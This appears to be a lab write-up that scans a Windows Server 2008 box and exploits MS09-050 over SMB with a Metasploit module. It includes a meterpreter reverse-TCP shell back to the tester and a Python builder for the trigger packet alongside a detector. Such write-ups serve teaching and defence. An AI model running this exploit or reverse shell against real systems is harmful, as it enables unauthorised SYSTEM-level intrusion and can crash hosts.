
PG - Internal

Exploiting MS09-050 (CVE-2009-3103) over SMB on port 445 using Metasploit to achieve remote code execution via a crafted SMBv2 negotiate request, gaining NT AUTHORITY\SYSTEM. Port 5357 (WSDAPI) turns out to be a dead end.


Recon

A full TCP port scan with nmap discovers several open ports.

sudo nmap -Pn -sS -sC -sV -T4 -vvv -p- "$TARGET"

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.0.6001 (17714650)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  syn-ack ttl 125 Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Service
| rdp-ntlm-info:
|   Target_Name: INTERNAL
|   NetBIOS_Domain_Name: INTERNAL
|   NetBIOS_Computer_Name: INTERNAL
|   DNS_Domain_Name: internal
|   DNS_Computer_Name: internal
|   Product_Version: 6.0.6001
|_  System_Time: 2025-03-07T11:44:35+00:00
|_ssl-date: 2025-03-07T11:44:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=internal
| Issuer: commonName=internal
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-01-05T19:52:51
| Not valid after:  2025-07-07T19:52:51
| MD5:   7c2b:85a9:1fe2:c264:4be8:ed3e:e16b:274a
| SHA-1: 05e9:c5e9:7ac6:242e:0a18:ca56:e1b5:1c38:31db:d393
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQFHV8TrpYYLdKV58423mJ8zANBgkqhkiG9w0BAQUFADAT
| MREwDwYDVQQDEwhpbnRlcm5hbDAeFw0yNTAxMDUxOTUyNTFaFw0yNTA3MDcxOTUy
| NTFaMBMxETAPBgNVBAMTCGludGVybmFsMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEAsuNdIa0z31V1iHCg2TtuOK+FoyVu3aXcVxL/Q8jUvhOtpe0fWn9j
| qpT+smMeA0XpJfeS917Tpy5t5gqyqUCAXPOwoeGnZu1IrvxwcMlpMImPGXeMZ+0q
| Cb/3LdlwA7WEUaZtAxpMHBx7UNbcEnj38BsrWY6zr/K7TDlFgsrsITDDuyddIjNz
| 2VU8gFBPPwzHZGMGsMgo2v3mCZnA6Xkp8tmwGq137fxrwbvzC3vNdt1/m5icsyYD
| hMglYmztE9vp0rwKB0CB5K+mwc9U7isWsRbORWutqkBbp4XI08RbSklP3A6XPUNu
| eUb1rIMV4ZbTbRTOKOGa12X7isXq6cVzOwIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQEFBQADggEBAE0duqOsApBP
| OvE8znZxfUgAF5f+WR+GsAPYwhV0c6GWv7PnghnTAFfoBy+8Gy1PeyrAwfL2PQqT
| AHIBgpfbkEWwA/idfGpTJNDF2n8uZ3W8hOBU7elqRAHtvj749IqnMz15n5WwsGvW
| A6hsOIoEKyluekiV9kOosMjKG9jtB+iwOe88L5EqHrEfPeml2mpvhH6VhvJZnXlJ
| 1l0/GDRRXslgyBir672iqHy25PNqJQYlEMSooxZCwKUpo345E4J6BIxeayvNeLca
| W+SKB84s3A/9pXnPEXLD7IT6I4ln9ZQeYXHK0n3U2LcSCt8JtEr1vfi4LMSboxxi
| lRXQzPUUSW8=
|_-----END CERTIFICATE-----
5357/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
49152/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49156/tcp open  unknown       syn-ack ttl 125
49157/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008::sp1, cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 1h35m59s, deviation: 3h34m40s, median: 0s
| smb2-security-mode:
|   2:0:2:
|_    Message signing enabled but not required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 38386/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 28118/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 54232/udp): CLEAN (Timeout)
|   Check 4 (port 64884/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:7c:45 (VMware)
| Names:
|   INTERNAL<00>         Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   INTERNAL<20>         Flags: <unique><active>
| Statistics:
|   00:50:56:ab:7c:45:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-03-07T03:44:35-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time:
|   date: 2025-03-07T11:44:34
|_  start_date: 2025-02-20T21:30:47

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.03 seconds
           Raw packets sent: 1054 (46.376KB) | Rcvd: 1012 (40.532KB)

SMB accepts a null session, but no shares are listed.

Port 5357 is running HTTP. Visiting it in a browser only returns an error:

Service unavailable

Port 5357 is uncommon, so I'll look up what normally listens there.

Info on port 5357

It is WSDAPI (Web Services on Devices), a Windows service, which is consistent with the Microsoft HTTPAPI httpd 2.0 banner nmap reported.

Next I'll look for any exploits related to this service.

WSDAPI exploit search

This suggests the service may be vulnerable to MS09-063, a remote code execution bug in WSDAPI. I'll continue searching.

Potential exploit

This time I have a possible exploit from ExploitDB.

I tried to run the exploit multiple times, but it is very unreliable, so I decided to look for another one.

Metasploit exploit search result

Exploitation

I'll use this exploit from Metasploit: exploit/windows/smb/ms09_050_smb2_negotiate_func_index. Note that this is a different bug from the WSDAPI one. MS09-050 (CVE-2009-3103) is an out-of-bounds function-table dereference in the kernel SMB2 driver srv2.sys, triggered by the Process ID High field of a negotiate request, and it is reached over SMB on port 445 rather than over port 5357. The recon already supports this choice of target: Windows Server 2008 SP1 (Windows Vista and Server 2008 are the affected platforms; Windows 7 and Server 2008 R2 are not), SMB2 dialect 2.0.2 advertised, and message signing not required.

Launch msfconsole and run the module:

msf6 > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set rhosts 192.168.196.40
rhosts => 192.168.196.40
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > set lhost tun0
lhost => tun0
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.45.161:4444
[*] 192.168.196.40:445 - Connecting to the target (192.168.196.40:445)...
[*] 192.168.196.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.196.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (177734 bytes) to 192.168.196.40
[*] Meterpreter session 1 opened (192.168.45.161:4444 -> 192.168.196.40:49159) at 2025-08-07 09:45:41 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Using the Metasploit module, I got a shell as NT AUTHORITY\SYSTEM. One caveat: because the vulnerable code lives in the kernel driver srv2.sys, a failed attempt can crash (BSOD) the target rather than just fail, so confirm the OS version and SMB2 dialect from the recon before firing it at a machine you cannot reboot.
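The two SMB messages the recon and the exploit revolve around, as an added example that is not part of the original post or of the Metasploit module: the SMB1 NEGOTIATE that every SMB2-capable client sends first (the message whose Process ID High field MS09-050 abuses), and the SMB2 NEGOTIATE response from which nmap's smb2-security-mode script derives "2:0:2" and "Message signing enabled but not required". The server reply is a constructed sample shaped like a Server 2008 SP1 answer, not a capture from this box, and the non-zero-PIDHigh detection rule is a heuristic of my own (legitimate Windows clients send 0 in that field). Nothing here sends traffic.

```python
"""SMB negotiate messages around MS09-050: build and parse the SMB1
NEGOTIATE request (PIDHigh at header offset 12 is the CVE-2009-3103
field) and parse an SMB2 NEGOTIATE response the way nmap reports it.
Offsets follow [MS-CIFS] 2.2.3.1 and [MS-SMB2] 2.2.1.1 / 2.2.4."""
import struct

SMB1_COM_NEGOTIATE = 0x72
SMB2_NEGOTIATE = 0x0000
SMB2_SIGNING_ENABLED = 0x0001   # SecurityMode bit: server can sign
SMB2_SIGNING_REQUIRED = 0x0002  # SecurityMode bit: server insists on signing


def netbios_frame(smb):
    """Prefix the 4-byte NetBIOS session header (type 0x00, 3-byte length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def build_smb1_negotiate(dialects, pid_high=0):
    """SMB1 NEGOTIATE offering `dialects`; pid_high is 0 in legitimate traffic."""
    header = struct.pack(
        "<4sBIBHH8sHHHHH",
        b"\xffSMB",          # ProtocolId
        SMB1_COM_NEGOTIATE,  # Command
        0,                   # Status
        0x18,                # Flags: case-insensitive, canonicalized paths
        0xC801,              # Flags2: unicode, NT status, ext. security, long names
        pid_high,            # PIDHigh (offset 12)
        b"\x00" * 8,         # SecurityFeatures
        0, 0,                # Reserved, TID
        0xFEFF,              # PIDLow
        0, 0,                # UID, MID
    )
    data = b"".join(b"\x02" + d + b"\x00" for d in dialects)  # SMB_Dialect list
    return netbios_frame(header + struct.pack("<BH", 0, len(data)) + data)


def parse_smb1_negotiate(frame):
    """Return (pid_high, [dialect, ...]) from a framed SMB1 NEGOTIATE request."""
    if len(frame) < 4 or frame[0] != 0:
        raise ValueError("not a NetBIOS session message")
    smb = frame[4:4 + int.from_bytes(frame[1:4], "big")]
    if len(smb) < 35 or smb[:4] != b"\xffSMB" or smb[4] != SMB1_COM_NEGOTIATE:
        raise ValueError("not an SMB1 NEGOTIATE request")
    pid_high = struct.unpack_from("<H", smb, 12)[0]
    word_count = smb[32]                                   # 0 for NEGOTIATE
    byte_count = struct.unpack_from("<H", smb, 33 + 2 * word_count)[0]
    start = 35 + 2 * word_count
    data = smb[start:start + byte_count]
    dialects = [d[1:] for d in data.split(b"\x00") if d[:1] == b"\x02"]
    return pid_high, dialects


def looks_like_ms09_050(frame):
    """Heuristic detector (my assumption, not from the post): a NEGOTIATE that
    offers SMB 2.x dialects with a non-zero PIDHigh. Windows clients send 0;
    srv2.sys used the value as a function-table index, and the public
    CVE-2009-3103 description names 0x0026 ('&') as the trigger value."""
    try:
        pid_high, dialects = parse_smb1_negotiate(frame)
    except ValueError:
        return False
    return pid_high != 0 and any(d.startswith(b"SMB 2.") for d in dialects)


def build_sample_smb2_negotiate_response(security_mode=SMB2_SIGNING_ENABLED,
                                         dialect=0x0202):
    """Constructed server reply (not a capture) with the SecurityMode and
    DialectRevision a Server 2008 SP1 host answers with."""
    header = struct.pack(
        "<4sHHIHHIIQIIQ16s",
        b"\xfeSMB", 64, 0, 0, SMB2_NEGOTIATE, 1,
        0x00000001,                     # Flags: SMB2_FLAGS_SERVER_TO_REDIR
        0, 0, 0, 0, 0, b"\x00" * 16,    # NextCommand..SessionId, Signature
    )
    body = struct.pack(
        "<HHHH16sIIIIQQHHI",
        65, security_mode, dialect, 0, b"\x00" * 16,   # ..Reserved, ServerGuid
        0x7, 0x10000, 0x10000, 0x10000,  # Capabilities, Max{Transact,Read,Write}
        0, 0,                            # SystemTime, ServerStartTime
        128, 0, 0,                       # SecurityBufferOffset/Length, Reserved2
    )
    return netbios_frame(header + body)


def parse_smb2_negotiate_response(frame):
    """Dialect and signing flags, formatted the way nmap reports them."""
    smb = frame[4:]
    if smb[:4] != b"\xfeSMB" or struct.unpack_from("<H", smb, 4)[0] != 64:
        raise ValueError("not an SMB2 message")
    if struct.unpack_from("<H", smb, 12)[0] != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE response")
    size, security_mode, dialect = struct.unpack_from("<HHH", smb, 64)
    if size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {
        "dialect": "%d:%d:%d" % (dialect >> 8, (dialect >> 4) & 0xF, dialect & 0xF),
        "signing_enabled": bool(security_mode & SMB2_SIGNING_ENABLED),
        "signing_required": bool(security_mode & SMB2_SIGNING_REQUIRED),
    }


if __name__ == "__main__":
    normal = build_smb1_negotiate([b"NT LM 0.12", b"SMB 2.002"])
    odd = build_smb1_negotiate([b"NT LM 0.12", b"SMB 2.002"], pid_high=0x26)
    print("normal flagged:", looks_like_ms09_050(normal))
    print("pid_high=0x26 flagged:", looks_like_ms09_050(odd))
    print(parse_smb2_negotiate_response(build_sample_smb2_negotiate_response()))
```

The detector is the piece a SOC could lift: SMB1 NEGOTIATE requests are the first bytes of every SMB session, and flagging a non-zero PIDHigh alongside an "SMB 2.xxx" dialect string is cheap and has essentially no legitimate hits from Windows clients. The response parser shows why nmap's "2:0:2" plus "signing enabled but not required" output is worth reading before choosing an exploit: it tells you the host speaks the SMB 2.002 dialect that Vista/2008-era srv2.sys implements.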

This post is licensed under CC BY 4.0 by the author.